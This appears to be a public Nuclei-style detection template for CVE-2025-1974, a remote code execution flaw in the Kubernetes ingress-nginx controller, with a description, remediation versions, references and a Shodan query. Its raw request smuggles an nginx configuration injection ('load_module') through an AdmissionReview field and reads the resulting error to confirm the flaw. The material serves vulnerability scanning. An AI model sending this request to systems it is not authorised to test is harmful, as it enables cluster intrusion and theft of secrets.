A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
PoC代码[已公开]
id: CVE-2025-1974
info:
name: Ingress-Nginx Controller - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch,UNC1739
severity: critical
description: |
A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
impact: |
Vulnerable versions of Ingress-Nginx controller can be exploited to gain unauthorized access to all secrets across namespaces in the Kubernetes cluster, potentially leading to complete cluster takeover.
remediation: |
Update to one of the following versions: Version 1.12.1 or later / Version 1.11.5 or later
reference:
- https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
- https://projectdiscovery.io/blog/ingressnightmare-unauth-rce-in-ingress-nginx
- https://nvd.nist.gov/vuln/detail/CVE-2025-1974
- https://https://github.com/kubernetes/kubernetes/issues/131009
- https://github.com/eeeeeeeeee-code/POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-1974
cwe-id: CWE-653
epss-score: 0.87763
epss-percentile: 0.99438
metadata:
verified: true
max-request: 1
shodan-query: ssl:"ingress-nginx" port:8443
tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s
variables:
string: "{{to_lower('{{randstr}}')}}"
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "{{string}}",
"kind": {
"group": "networking.k8s.io",
"version": "v1",
"kind": "Ingress"
},
"resource": {
"group": "networking.k8s.io",
"version": "v1",
"resource": "ingresses"
},
"requestKind": {
"group": "networking.k8s.io",
"version": "v1",
"kind": "Ingress"
},
"requestResource": {
"group": "networking.k8s.io",
"version": "v1",
"resource": "ingresses"
},
"name": "test-{{randstr}}",
"namespace": "default",
"operation": "CREATE",
"userInfo": {
"uid": "{{string}}"
},
"object": {
"kind": "Ingress",
"apiVersion": "networking.k8s.io/v1",
"metadata": {
"name": "test-{{randstr}}",
"namespace": "default",
"creationTimestamp": null,
"uid": "InjectTest#;\n\n}\n}\n}\nload_module test;",
"annotations": {
"nginx.ingress.kubernetes.io/mirror-target": "fake-mirror-target"
}
},
"spec": {
"ingressClassName": "nginx",
"rules": [
{
"host": "test.example.com",
"http": {
"paths": [
{
"path": "/",
"pathType": "Prefix",
"backend": {
"service": {
"name": "kubernetes",
"port": {
"number": 443
}
}
}
}
]
}
}
]
},
"status": {
"loadBalancer": {}
}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
}
}
matchers:
- type: word
part: body
words:
- 'AdmissionReview'
- 'load_module'
- 'directive is specified too late'
condition: and
# digest: 490a00463044022042f299c84c6b2c36b48d9370adb67e44fd343e109e8e346d5af26874f146c8e7022033163ac586b3eea7079d3ca3f8133f121df5a24d5da5cd6aefceec5359929ba6:922c64590222798bb761d5b6d8e72950